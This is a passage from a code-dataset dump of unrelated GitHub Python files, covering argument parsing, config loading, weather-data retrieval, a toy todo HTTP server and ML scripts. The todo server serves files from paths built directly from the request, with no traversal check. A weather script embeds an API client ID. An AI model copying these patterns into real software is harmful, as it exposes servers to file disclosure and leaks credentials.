default=[])\n\n parser.add_argument('-l', '--lands', nargs='*', type=str, default={},\n help='cells with not standard speed to go; '\n 'format: c,k; '\n 'where k is coef of speed and c is the symbol '\n 'in labyrinth for this land type')\n\n parser.add_argument('-w', '--walls', nargs='*', type=str, default=[],\n help='walls with K bombs to damage; format: '\n 'i,j:k where k is amount of bombs')\n\n parser.add_argument('--timebomb', help='time to use 1 bomb',\n type=int, default=0)\n\n parser.add_argument('-o', '--output',\n help=\"you can choose 'wasd', \"\n \"'on_lab' and 'text' - point out it with \",\n type=str, default='on_lab')\n parser.add_argument('-g', '--generator',\n help=\"when yot input labyrinth from generator \"\n \"with additional information\",\n action='store_true')\n\n\ndef parse_input(labth):\n parser = argparse.ArgumentParser('labyrinth')\n add_args(parser)\n args = parser.parse_args()\n labth.filename = None\n labth.filename = args.inputfile\n labth.bombs = args.bombs\n labth.finish = exit_parse(args.exits)\n labth.alpha = args.alpha\n labth.timebomb = args.timebomb\n labth.start = args.starts\n labth.landtypes = land_parse(args.lands)\n labth.kwalls = wall_coef_parse(args.walls)\n labth.output_type = args.output\n if args.generator:\n labth.generator_input = True\n return labth\n\n\ndef correct_input(labth):\n if labth.filename:\n try:\n with open(labth.filename, 'r') as labyrinth:\n pass\n except (FileNotFoundError, FileExistsError) as e:\n raise ValueError(\"No such file or directory: \" + labth.filename)\n # sys.stderr.write(\"No such file or directory: \" + labth.filename)\n return False\n\n for coord, k in labth.kwalls.items():\n i, j = coord\n if labth.lab[i][j] != 'w' or k < 0:\n raise ValueError(\"Incorrect Argument: walls\")\n return False\n\n for symbol, k in labth.landtypes.items():\n if len(symbol) > 1 or k < 0:\n raise ValueError(\"Incorrect Argument: land types\")\n return False\n\n if not 0 <= labth.alpha <= 1:\n raise ValueError(\"Incorrect Argument: alpha should be in [0,1]\")\n return False\n\n if labth.bombs < 0:\n raise ValueError(\"Incorrect Argument: bombs should be positive number\")\n return False\n\n if labth.timebomb < 0:\n raise ValueError(\"Incorrect Argument: \"\n \"time to make bomb should be positive number\")\n return False\n\n if labth.output_type not in ('on_lab', 'wasd', 'text'):\n raise ValueError(\"Incorrect output type: \"\n \"should be \\'wasd\\', \\'on_lab\\' or \\'text\\'\")\n return False\n\n return True\n","repo_name":"Frankmayerr/labyrinth","sub_path":"modules/parsing.py","file_name":"parsing.py","file_ext":"py","file_size_in_byte":4885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23585253778","text":"# -*- coding: utf-8 -*-\n\"\"\"Module for loading JSON configuration.\"\"\"\n\nimport json\nimport os\n\n_path = os.path.abspath(__file__)\n_dir_path = os.path.dirname(_path)\n\nCONFIG_EXT = \".json\"\nCONFIG_DIR = \"config\"\nCONFIG_PATH = os.getenv(\n 'PARKER_CONFIG',\n os.path.join(\n _dir_path,\n CONFIG_DIR\n )\n)\nCONFIG_SITES_PATH = 'sites'\n\n\ndef _load_config_json(file_path):\n \"\"\"Load the passed file as JSON.\"\"\"\n return json.load(open(file_path))\n\n\ndef load_config(name):\n \"\"\"Load and return configuration as a dict.\"\"\"\n return _load_config_json(\n os.path.join(\n CONFIG_PATH,\n name + CONFIG_EXT\n )\n )\n\n\ndef load_site_config(name):\n \"\"\"Load and return site configuration as a dict.\"\"\"\n return _load_config_json(\n os.path.join(\n CONFIG_PATH,\n CONFIG_SITES_PATH,\n name + CONFIG_EXT\n )\n )\n","repo_name":"nefarioustim/parker","sub_path":"parker/configloader.py","file_name":"configloader.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"28999511015","text":"import tensorflow as tf\nimport numpy as np\nimport keras\nimport Model\nimport PIL.Image as Image\nimport argparse\nimport matplotlib.pyplot as plt\nimport time\nimport Generator\nimport librosa\nimport Generator\n\nparser = argparse.ArgumentParser(description='Sound texture expansion. Test phase')\nparser.add_argument('image1', type=str, help='audio name')\nparser.add_argument('--Iter', type=int, default=1000, required=False, help='number of iterations to run.')\nparser.add_argument('--layer_D', type=int, default=4, help='number of deep layers')\nparser.add_argument('--Adam', type=int, default=0, help='use Adam|Rmsprop')\nparser.add_argument('--mean', type=int, default=0, help='use mean|Gram')\nparser.add_argument('--Model', type=int, default=2, help='which model')\nparser.add_argument('--inner', type=int, default=10, help='number of Langevin steps in each iteration')\nparser.add_argument('--Gau', type=float, default=0.0, help='Gaussian penalty')\nparser.add_argument('--sn', type=float, default=0, help='Fourier norm penalty')\nparser.add_argument('--diversity', type=str, default='No', help='diversity penalty in which layer')\nparser.add_argument('--d_weight', type=float, default=0, help='diversity penalty')\nparser.add_argument('--step', type=int, default=0, help='which model to use')\n\nargs = parser.parse_args()\n\nimg_nrows = 24576\n\nx = Generator.pyramid_tf(img_nrows * 5, 8, 1, is_training=False)\n\n\nsaver = tf.train.Saver()\nsess = tf.Session()\n\nsave_name = args.image1 + '_depth_' + str(args.layer_D) + \\\n\t\t\t'_inner_' + str(args.inner) + '_IsMean_' + str(args.mean) + '_Adam_' + str(args.Adam) + \\\n\t\t\t'_Gau_' + str(args.Gau) + '_diversity_' + args.diversity + '_d_weight_' + str(args.d_weight)\n\ncheckpoint_dir = './Saved_model/' + save_name + '/' + '-' + str(args.step)\nsaver.restore(sess, checkpoint_dir)\n\nout = sess.run(x)\n\narg_dir = './Saved_model/' + save_name + '/'\nm, M, fs = np.load(arg_dir + 'args.npy')\nfs = int(fs)\n\ntmp = np.clip(out[0], -1, 1)\n\ntmp = (tmp + 0.5) * (M - m) + m\n\nlibrosa.output.write_wav('Produce_Generator/' + save_name + '.wav', tmp, fs)\n\n","repo_name":"wzm2256/cgCNN","sub_path":"sound_expansion/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"2411155499","text":"###\n# retrieves precipitation data from MET stations for a set of dates and times\n# and stores it in .xlsx format\n###\n\nimport numpy as np\nfrom netCDF4 import Dataset \nimport pandas as pd\nimport datetime\nimport requests\nimport xarray as xr\nfrom utils import date_to_string, get_period\n\ndef get_MET_data(station, data, period):\n # retrieves desired \"data\" during \"period\" from a given MET \"station\"\n # by accessing MET's Frost API\n \n client_id = '3695f017-f71e-43bc-b3e0-8a0fb90c2608'\n endpoint = 'https://frost.met.no/observations/v0.jsonld'\n parameters = {\n 'sources': station, \n 'elements': data, \n 'referencetime': period,\n }\n\n # Issue GET request\n r = requests.get(endpoint, parameters, auth=(client_id,''))\n print(\"Issued GET request to frost API...\")\n # Extract JSON data\n json = r.json()\n\n if r.status_code == 200:\n data = json['data']\n print('Data retrieved from frost.met.no!')\n else:\n print('Error! Returned status code %s' % r.status_code)\n print('Message: %s' % json['error']['message'])\n print('Reason: %s' % json['error']['reason'])\n\n # This will return a Dataframe with all of the observations in a table format\n df = pd.DataFrame()\n for i in range(len(data)):\n row = pd.DataFrame(data[i]['observations'])\n row['referenceTime'] = data[i]['referenceTime']\n row['sourceId'] = data[i]['sourceId']\n df = df.append(row)\n\n # Retain the following columns\n columns = ['sourceId','referenceTime','elementId','value','unit','timeOffset', 'timeResolution']\n df2 = df[columns].copy()\n # Convert the time value to datetime\n df2['referenceTime'] = pd.to_datetime(df2['referenceTime'],utc=True)\n\n return df2\n\ndef run(y, m, d): \n pd.set_option('display.expand_frame_repr', False)\n period = get_period(y, m)\n y, m, d = date_to_string(y, m, d)\n ds = xr.open_dataset(f'data/Radiosonde/andoya/{y}/andoya_' + period + '.nc')\n data_rs = ds.to_dataframe()\n sample_time = [tuple[0]+tuple[1] for tuple in data_rs.index]\n start_time_cm = data_rs.index.get_level_values(0)\n sid = start_time_cm\n data_rs.insert(1, 'sampleseries_id', sid)\n data_rs.insert(0, \"UTC time\", sample_time)\n\n # get the radiosonde data for the day of interest:\n dates = pd.to_datetime(data_rs['sampleseries_id']).dt.date\n desired_date = datetime.date(year=int(y), month=int(m), day=int(d))\n idx = (dates == desired_date)\n \n if len(idx[idx == True]) == 0:\n print(f\"Error: Unavailable radiosonde data for {d}.{m}.{y}\")\n return\n\n data = data_rs.loc[idx]\n unique_sids = data['sampleseries_id'].unique()\n grouped_rs_data = data.groupby('sampleseries_id') \n next_date = desired_date + datetime.timedelta(days=1)\n precip_data = get_MET_data(station='SN87110', data='sum(precipitation_amount PT10M)', period=f'{desired_date}/{next_date}')\n \n out = []\n for sid in unique_sids:\n ### RADIOSONDE DATA\n plot_data = grouped_rs_data.get_group(sid)\n time = pd.to_datetime(plot_data['UTC time'], utc=True)\n # time = np.array(time.dt.to_pydatetime()) # radiosonde launch time\n starttime_rs = time[0]\n stoptime_rs = time[-1]\n starttime_rs_string = starttime_rs.strftime('%Y-%m-%d %H:%M:%S')\n stoptime_rs_string = stoptime_rs.strftime('%Y-%m-%d %H:%M:%S')\n \n ### precipitation\n p0 = starttime_rs - datetime.timedelta(minutes=60)\n p1 = starttime_rs + datetime.timedelta(minutes=60)\n precipitation = precip_data[precip_data['referenceTime'].between(p0, p1)] # precipitation around radiosonde launch time\n \n if (precipitation.value > 0).any() :\n col = precipitation['referenceTime'].dt.tz_localize(None)\n precipitation = precipitation.assign(referenceTime=col)\n if len(out)==0:\n out = precipitation\n else:\n out = pd.concat([out, precipitation])\n\n if len(out)==0:\n return 0 \n else:\n return out\n\nwith open('dates_measurements.txt') as f:\n next(f)\n i = 0\n for line in f:\n if not line.strip():\n break\n date = line.rsplit(' ')[0]\n split = date.split('.')\n d = int(str.strip(split[0]))\n m = int(str.strip(split[1]))\n y = int('20' + str.strip(split[2])) \n\n df2 = run(y, m, d)\n if type(df2) == int:\n continue\n if i == 0:\n output = df2\n else:\n output = pd.concat([output, df2])\n i+=1\n \n with pd.ExcelWriter('precipitation.xlsx') as writer:\n output.to_excel(writer) ","repo_name":"tmpk/IceWarn","sub_path":"check_precipitation.py","file_name":"check_precipitation.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6844087132","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nfrom os import curdir, sep\nfrom BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer\n\nclass Database:\n\n def __init__(self):\n self.db = {}\n self.count = 0\n\n def add_note(self, note):\n self.count += 1\n self.db[self.count] = {'id': self.count, 'note': note}\n return self.db[self.count]\n\n def delete_note(self, id):\n if id in self.db:\n del self.db[id]\n return\n\n def get_notes(self):\n return self.db.values()\n\n\ndatabase = Database()\n\n\n# HTTPRequestHandler class\nclass todoHTTPServer_RequestHandler(BaseHTTPRequestHandler):\n\n backend_path = \"/todo\"\n \n # GET\n def do_GET(self):\n self.send_response(200)\n if self.path == self.backend_path:\n self.send_header('Content-type','application/json')\n self.end_headers()\n notes = database.get_notes()\n self.wfile.write(json.dumps(notes))\n else:\n path = '../frontend/'\n if self.path==\"/\":\n self.path=\"index.html\"\n elif self.path.endswith(\".html\"):\n mimetype='text/html'\n sendReply = True\n elif self.path.endswith(\".js\"):\n mimetype='application/javascript'\n sendReply = True\n elif self.path.endswith(\".css\"):\n mimetype='text/css'\n sendReply = True\n else:\n self.send_response(404)\n return\n f = open(curdir + sep + path + self.path)\n self.send_response(200)\n self.send_header('Content-type', mimetype)\n self.end_headers()\n self.wfile.write(f.read())\n f.close()\n return\n\n #POST\n def do_POST(self):\n if self.path == self.backend_path:\n length = int(self.headers['Content-length'])\n body = self.rfile.read(length)\n postvars = json.loads(body)\n note = postvars['todo']\n new_note = database.add_note(note)\n self.send_response(201)\n self.send_header('Content-type','application/json')\n self.end_headers()\n self.wfile.write(json.dumps(new_note))\n return\n\n def do_DELETE(self):\n if self.path.startswith(self.backend_path):\n id = int(self.path.split(\"/\")[2])\n print(id)\n database.delete_note(id)\n self.send_response(200)\n self.end_headers()\n return\n\ndef run():\n print('starting server...')\n server_address = ('127.0.0.1', 8081)\n httpd = HTTPServer(server_address, todoHTTPServer_RequestHandler)\n print('running server...')\n httpd.serve_forever()\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--run\", help=\"Run the server\",\n action=\"store_true\")\nargs = parser.parse_args()\nif args.run:\n run()\n","repo_name":"EducationalEra/taskManagerApp","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"36002525049","text":"from PyQt5.QtWidgets import QAction\n\nimport actioncollection\nimport actioncollectionmanager\nimport plugin\n\n\nclass Rest(plugin.MainWindowPlugin):\n def __init__(self, mainwindow):\n self.actionCollection = ac = Actions()\n actioncollectionmanager.manager(mainwindow).addActionCollection(ac)\n ac.rest_fmrest2spacer.triggered.connect(self.fmrest2spacer)\n ac.rest_spacer2fmrest.triggered.connect(self.spacer2fmrest)\n ac.rest_restcomm2rest.triggered.connect(self.restcomm2rest)\n\n def fmrest2spacer(self):\n from . import rest\n cursor = self.mainwindow().textCursor()\n rest.fmrest2spacer(cursor)\n\n def spacer2fmrest(self):\n from . import rest\n cursor = self.mainwindow().textCursor()\n rest.spacer2fmrest(cursor)\n\n def restcomm2rest(self):\n from . import rest\n cursor = self.mainwindow().textCursor()\n rest.restcomm2rest(cursor)\n\n\nclass Actions(actioncollection.ActionCollection):\n name = \"rest\"\n def createActions(self, parent):\n self.rest_fmrest2spacer = QAction(parent)\n self.rest_spacer2fmrest = QAction(parent)\n self.rest_restcomm2rest = QAction(parent)\n\n def translateUI(self):\n self.rest_fmrest2spacer.setText(_(\n \"Replace full measure rests with spacer rests\"))\n self.rest_fmrest2spacer.setToolTip(_(\n \"Change all R to s \"\n \"in this document or in the selection.\"))\n self.rest_spacer2fmrest.setText(_(\n \"Replace spacer rests with full measure rests\"))\n self.rest_spacer2fmrest.setToolTip(_(\n \"Change all s to R \"\n \"in this document or in the selection.\"))\n self.rest_restcomm2rest.setText(_(\n \"Replace positioned rests with plain rests\"))\n self.rest_restcomm2rest.setToolTip(_(\n \"Change all \\\\rest with r \"\n \"in this document or in the selection.\"))\n\n","repo_name":"frescobaldi/frescobaldi","sub_path":"frescobaldi_app/rest/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":673,"dataset":"github-code","pt":"38"} +{"seq_id":"25780342126","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@desc: 一球从100米高度自由落下,每次落地后反跳回原高度的一半;\n 再落下,求它在第10次落地时,共经过多少米?第10次反弹多高?\n@author: Yuanhao Luo\n@contact: luoyuanhao@software.ict.ac.cn\n@file: exam20.py\n@time: 2016/12/21 19:41\n\"\"\"\n\n\ndef func(h, c):\n dist = h\n for i in range(c - 1):\n dist += h\n h /= 2\n return dist, h / 2\n\n\nif __name__ == \"__main__\":\n dist, h = func(100.0, 10)\n print('dist = %f, h = %f' % (dist, h))\n","repo_name":"ictlyh/PythonExamples","sub_path":"exam20.py","file_name":"exam20.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"8821963492","text":"\"\"\"\nAdd index to group.name column.\n\nRevision ID: 21f87f395e26\nRevises: 0d4755a0d88b\nCreate Date: 2016-03-24 15:12:59.803179\n\n\"\"\"\n\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"21f87f395e26\"\ndown_revision = \"0d4755a0d88b\"\n\n\ndef upgrade():\n # Creating a concurrent index does not work inside a transaction\n op.execute(\"COMMIT\")\n op.create_index(\n op.f(\"ix__group__name\"), \"group\", [\"name\"], postgresql_concurrently=True\n )\n\n\ndef downgrade():\n op.drop_index(op.f(\"ix__group__name\"), \"group\")\n","repo_name":"hypothesis/h","sub_path":"h/migrations/versions/21f87f395e26_add_group_name_index.py","file_name":"21f87f395e26_add_group_name_index.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":2810,"dataset":"github-code","pt":"38"} +{"seq_id":"28555636805","text":"#!/usr/bin/env python3\n\nimport os\nfrom ontobio.ontol_factory import OntologyFactory\n\nPATH_HPO = os.path.abspath(\"../ontologies/hpo.json\")\nPATH_MPO = os.path.abspath(\"../ontologies/mpo.json\")\n\nhpo = OntologyFactory().create(handle=PATH_HPO)\nmpo = OntologyFactory().create(handle=PATH_MPO)\n\ndef replace_terms_by_level(terms, ontology_type, level_terms):\n \"\"\"\n Takes list of terms, ontology type ('hp' or 'mp') \n and list of target-level terms.\n Returns a list of target-level terms that are\n ancestors of input terms. \n \"\"\"\n\n result = set()\n level_terms_set = set(level_terms)\n \n if ontology_type == 'hp':\n for term in terms:\n if term == '':\n result.add('')\n if term in level_terms:\n result.add(term)\n continue\n\n parents = set(hpo.ancestors(term, reflexive=False))\n result_partial = level_terms_set.intersection(parents)\n result.update(result_partial)\n\n if ontology_type == 'mp':\n for term in terms:\n if term == '':\n result.add('')\n if term in level_terms:\n result.add(term)\n continue\n \n parents = set(mpo.ancestors(term, reflexive=False))\n result_partial = level_terms_set.intersection(parents)\n result.update(result_partial)\n\n return list(result)\n\n","repo_name":"pavlovanadia/genotype_to_phenotype","sub_path":"scripts/low2system.py","file_name":"low2system.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"13875798307","text":"import gc\nimport numpy as np\nfrom pandas import DataFrame as df\nfrom func_data import load_data\nfrom func_model import model\n\n\ndef nested(\n model_dir=None,\n n_runs=10,\n layers_list=(2,),\n neurons_per_layer_list=(10,),\n training_steps_list=(2000,),\n training_items_list=(42,)\n):\n result_dict = {\n 'layers': [],\n 'neurons_per_layer': [],\n 'training_step': [],\n 'training_data': [],\n 'test accuracy': [],\n 'train accuracy': [],\n }\n\n train_individual_accuracy_all = []\n test_individual_accuracy_all = []\n\n count_sim = 0\n total_sim = len(layers_list) * len(neurons_per_layer_list) * len(training_steps_list) * len(\n training_items_list) * n_runs - 1\n\n for layers in layers_list:\n for neurons_per_layer in neurons_per_layer_list:\n for training_steps in training_steps_list:\n for training_items in training_items_list:\n\n train_individual_accuracy = []\n test_individual_accuracy = []\n\n for i in np.arange(0, n_runs):\n print('{}/{}'.format(count_sim, total_sim))\n count_sim += 1\n\n train, test = load_data(n_train=training_items, shuffle=True)\n\n train_accuracy, test_accuracy = model(\n train, test,\n model_dir=model_dir,\n training_steps=training_steps,\n layers=layers,\n neurons_per_layer=neurons_per_layer\n )\n\n train_individual_accuracy.append(train_accuracy)\n test_individual_accuracy.append(test_accuracy)\n\n train_individual_accuracy_all.append(train_individual_accuracy)\n test_individual_accuracy_all.append(test_individual_accuracy)\n\n result_dict['layers'].append(layers)\n result_dict['neurons_per_layer'].append(neurons_per_layer)\n result_dict['training_step'].append(training_steps)\n result_dict['training_data'].append(training_items)\n result_dict['test accuracy'].append(np.average(test_individual_accuracy))\n result_dict['train accuracy'].append(np.average(train_individual_accuracy))\n\n test_individual_accuracy_all = np.asarray(test_individual_accuracy_all)\n train_individual_accuracy_all = np.asarray(train_individual_accuracy_all)\n np.savetxt('results_test_accuracy4.csv', test_individual_accuracy_all, delimiter=',')\n np.savetxt('results_train_accuracy4.csv', train_individual_accuracy_all, delimiter=',')\n\n df_result = df.from_dict(result_dict)\n df_result.to_csv('results_summary4.csv')\n\n # shutil.rmtree(model_dir, ignore_errors=True)\n\n gc.collect()","repo_name":"PySFE/ctbuh_alpha","sub_path":"project/func_ana.py","file_name":"func_ana.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33918356158","text":"#\n# Hello World server in Python\n# Binds REP socket to tcp://*:7331\n# Expects b\"Hello\" from client, replies with b\"World\"\n#\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"-1\"\nimport time\nimport zmq\nimport md_config as cfg\nimport numpy as np\nimport pandas as pd\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, CuDNNLSTM, Dense, TimeDistributed, GlobalAveragePooling1D, Activation, \\\n BatchNormalization\nimport h5py\nimport copy\n\ndef define_model(hparams):\n current_n_lstms = hparams['NUM_LSTM_LAYERS']\n current_lstm_units = hparams['LSTM_UNITS']\n current_n_denses = hparams['NUM_DENSE_LAYERS']\n current_dense_units = hparams['DENSE_UNITS']\n current_dropout_rates = hparams['DROPOUT_RATES']\n current_time_step = hparams['TIME_STEP']\n current_input_units = hparams['INPUT_UNITS']\n current_densen_act = hparams['ACTIVATION_F']\n\n model = Sequential()\n if hparams['FC1'][1] > 0:\n model.add(TimeDistributed(Dense(hparams['FC1'][1], activation='relu'),\n input_shape=(current_time_step, hparams['FC1'][0])))\n\n model.add(LSTM(current_lstm_units[0], return_sequences=True, input_shape=(current_time_step, current_input_units),\n stateful=False))\n # CuDNNLSTM(current_lstm_units[0], return_sequences=True, input_shape=(current_time_step, current_input_units),\n # stateful=False))\n\n if current_n_lstms > 1:\n for idx in range(1, current_n_lstms):\n model.add(LSTM(current_lstm_units[idx], return_sequences=True))\n # model.add(CuDNNLSTM(current_lstm_units[idx], return_sequences=True))\n\n for idx in range(current_n_denses):\n model.add(TimeDistributed(Dense(current_dense_units[idx], activation='relu')))\n # model.add(TimeDistributed(Dropout(0.3)))\n\n model.add(TimeDistributed(Dense(1, activation=current_densen_act)))\n model.add(GlobalAveragePooling1D())\n\n return model\n\ndef load_weights_to_model(current_model, hparams, ft_type):\n \"\"\" Only apply to the LSTM model in this file, for other models, try to change :v\"\"\"\n f = h5py.File('./models/{}_{}_models_{}_{}_0_epochs{}_best_weight.h5'.format(hparams['model_path'], ft_type,\n hparams['n_segments'],\n hparams['alpha'],\n hparams['EPOCHS']), 'r')\n print(list(f.keys()))\n\n # tmp2 = current_model.layers[6].get_weights()\n\n current_model.layers[0].set_weights([f['time_distributed_2']['time_distributed_2']['kernel:0'].value,\n f['time_distributed_2']['time_distributed_2']['bias:0'].value])\n current_model.layers[1].set_weights(\n [f['cu_dnnlstm']['cu_dnnlstm']['kernel:0'].value, f['cu_dnnlstm']['cu_dnnlstm']['recurrent_kernel:0'].value,\n f['cu_dnnlstm']['cu_dnnlstm']['bias:0'].value])\n current_model.layers[2].set_weights([f['cu_dnnlstm_1']['cu_dnnlstm_1']['kernel:0'].value,\n f['cu_dnnlstm_1']['cu_dnnlstm_1']['recurrent_kernel:0'].value,\n f['cu_dnnlstm_1']['cu_dnnlstm_1']['bias:0'].value])\n current_model.layers[3].set_weights([f['time_distributed']['time_distributed']['kernel:0'].value,\n f['time_distributed']['time_distributed']['bias:0'].value])\n current_model.layers[4].set_weights([f['time_distributed_1']['time_distributed_1']['kernel:0'].value,\n f['time_distributed_1']['time_distributed_1']['bias:0'].value])\n current_model.layers[5].set_weights([f['time_distributed_3']['time_distributed_3']['kernel:0'].value,\n f['time_distributed_3']['time_distributed_3']['bias:0'].value])\n\n f.close()\n return current_model\n\ndef get_gaze_features(raw_input):\n \"\"\"\n Get gaze features from raw input\n :param raw_input:\n :return:\n \"\"\"\n # Get statiscal feature from raw input\n gaze_direction = raw_input[:, 5:11]\n gaze_angle = raw_input[:, 11: 13]\n eye_landmark2D = raw_input[:, 13: 125]\n eye_landmark3D = raw_input[:, 125: 293]\n pose_direction = raw_input[:, 293: 299]\n face_landmark2D = raw_input[:, 299: 435]\n face_landmark3D = raw_input[:, 435: 679]\n au_reg = raw_input[:, 679: 695]\n au_cls = raw_input[:, 695: 713]\n\n gaze_direction_std = np.std(gaze_direction, axis=0)\n gaze_direction_mean = np.mean(gaze_direction, axis=0)\n\n gaze_angle_std = np.std(gaze_angle, axis=0)\n gaze_angle_mean = np.mean(gaze_angle, axis=0)\n\n eye_landmark2D_shape_0 = np.abs(eye_landmark2D[:, 56 + 9: 56 + 14] - eye_landmark2D[:, 56 + 19: 56 + 14: -1])\n eye_landmark2D_shape_1 = np.abs(eye_landmark2D[:, 56 + 37: 56 + 42] - eye_landmark2D[:, 56 + 47: 56 + 42: -1])\n eye_landmark2D_shape = np.hstack((eye_landmark2D_shape_0, eye_landmark2D_shape_1))\n eye_landmark2D_shape_cov = np.divide(np.std(eye_landmark2D_shape, axis=0),\n np.mean(eye_landmark2D_shape, axis=0))\n\n eye_distance = 0.5 * (eye_landmark3D[:, 56 * 2 + 8] + eye_landmark3D[:, 56 * 2 + 42])\n eye_distance_cov = np.std(eye_distance) / np.mean(eye_distance)\n eye_distance_ratio = np.min(eye_distance) / np.max(eye_distance)\n eye_distance_fea = np.array([eye_distance_cov, eye_distance_ratio])\n\n eye_location2D = []\n for idx in range(4):\n cur_mean = np.mean(eye_landmark2D[:, 28 * idx: 28 * (idx + 1)], axis=1)\n eye_location2D.append(cur_mean)\n\n eye_location2D = np.vstack(eye_location2D).T\n eye_location2D_mean = np.mean(eye_location2D, axis=0)\n eye_location2D_std = np.std(eye_location2D, axis=0)\n\n eye_location3D = []\n for idx in range(6):\n cur_mean = np.mean(eye_landmark3D[:, 28 * idx: 28 * (idx + 1)], axis=1)\n eye_location3D.append(cur_mean)\n eye_location3D = np.vstack(eye_location3D).T\n eye_location3D_mean = np.mean(eye_location3D, axis=0)\n eye_location3D_std = np.std(eye_location3D, axis=0)\n\n pose_direction_mean = np.mean(pose_direction, axis=0)\n pose_direction_std = np.std(pose_direction, axis=0)\n ret_features = np.hstack((gaze_direction_std, gaze_direction_mean, gaze_angle_mean, gaze_angle_std,\n eye_landmark2D_shape_cov, eye_location2D_mean, eye_location2D_std,\n eye_location3D_mean,\n eye_location3D_std, eye_distance_fea, pose_direction_mean, pose_direction_std))\n\n return ret_features\n\ndef parse_df(df_path, n_segments=15, alpha=0.5, prev_frames=-1):\n try:\n df = pd.read_csv(df_path, header=0, sep=',').values\n face_id = df[:, 1]\n seq_length = df.shape[0]\n # print(\"Seq length: \", seq_length)\n if seq_length < 100:\n return None\n indexing = int((n_segments - 1) * (1 - alpha))\n k_value = seq_length // (1 + indexing) # In some case, we will ignore some last frames\n\n ret = []\n index_st = 0\n for idx in range(n_segments):\n index_ed = k_value + int(k_value * (1 - alpha) * idx)\n index_features = get_gaze_features(df[index_st: index_ed, :])\n ret.append(index_features)\n index_st = index_ed - int((1 - alpha) * k_value)\n\n ret = np.vstack(ret)\n except:\n print('IO error')\n ret = None\n\n return ret\n\ndef get_model(model_index, n_segments=15, input_units=60):\n \"\"\"\n Make prediction for data_npy\n :param data_npy:\n :return:\n \"\"\"\n ld_cfg = cfg.md_cfg\n hparams = copy.deepcopy(ld_cfg[model_index])\n\n if 'VGG' in hparams['NAME']:\n ft_type = 'vgg2'\n elif 'OF' in hparams['NAME']:\n ft_type = 'of'\n else:\n ft_type = 'au'\n\n hparams['TIME_STEP'] = n_segments\n hparams['INPUT_UNITS'] = hparams['FC1'][1] if hparams['FC1'][1] > 0 else input_units\n hparams['optimizer'] = 'adam'\n hparams['ACTIVATION_F'] = 'tanh'\n hparams['CLSW'] = 1\n\n cur_model = define_model(hparams)\n cur_model.build()\n # load_weights_to_model(cur_model, hparams, ft_type)\n cur_model.load_weights(\n './models/{}_{}_models_{}_{}_0_epochs{}_best_weight.h5'.format(hparams['model_path'], ft_type,\n hparams['n_segments'], hparams['alpha'],\n hparams['EPOCHS']))\n\n return cur_model\n\nif __name__ == '__main__':\n context = zmq.Context()\n socket = context.socket(zmq.REP)\n socket.bind(\"tcp://*:7331\")\n\n # Model index: 0, 1 for VGG_SE and 2, 3 for EyeGaze_HeadPose\n eye_gaze_v1 = get_model(model_index=2)\n eye_gaze_v2 = get_model(model_index=3)\n prev_frames = -1\n while True:\n # Wait for next request from client\n message = socket.recv()\n # print(\"Received request: %s\" % message)\n df_path = message.decode(\"utf-8\")\n # print(df_path)\n eye_gaze_features = parse_df(df_path, n_segments=15, alpha=0.5, prev_frames=prev_frames)\n\n if eye_gaze_features is not None:\n # print(eye_gaze_features.shape)\n eye_gaze_features = eye_gaze_features[np.newaxis, :]\n # print(eye_gaze_features.shape)\n\n v1 = eye_gaze_v1.predict(eye_gaze_features)[0][0]\n v2 = eye_gaze_v2.predict(eye_gaze_features)[0][0]\n enga_score = 0.5*(v1 + v2)\n # Do some 'work'\n # time.sleep(.300)\n send_str = \"{:.5f}\".format(enga_score)\n # Send reply back to client\n socket.send(send_str.encode('ascii'))\n else:\n socket.send(b'NA')","repo_name":"littleZY/SML_EW_EmotiW2019","sub_path":"EW_zmq.py","file_name":"EW_zmq.py","file_ext":"py","file_size_in_byte":9882,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"38"} +{"seq_id":"4343137799","text":"\nimport re\nimport logging\n\nfrom plow.gui.manifest import QtCore, QtGui\n\nLOGGER = logging.getLogger(__name__)\n\nDATA_ROLE = QtCore.Qt.UserRole \n\n_ALNUM_RX = re.compile('([0-9]+)')\n\ndef alphaNumericKey(aString):\n return [ int(c) if c.isdigit() else c for c in _ALNUM_RX.split(aString) ]\n\n\nclass AlnumSortProxyModel(QtGui.QSortFilterProxyModel):\n\n RX_ALNUMS = QtCore.QRegExp('(\\d+|\\D+)')\n\n def __init__(self, *args, **kwargs):\n super(AlnumSortProxyModel, self).__init__(*args, **kwargs)\n\n self.setSortRole(DATA_ROLE)\n self.__validAlnum = (str, unicode)\n\n def lessThan(self, left, right):\n sortRole = self.sortRole()\n leftData = left.data(sortRole)\n\n if isinstance(leftData, self.__validAlnum):\n \n rightData = right.data(sortRole)\n\n if leftData == rightData:\n return False\n\n return alphaNumericKey(leftData) < 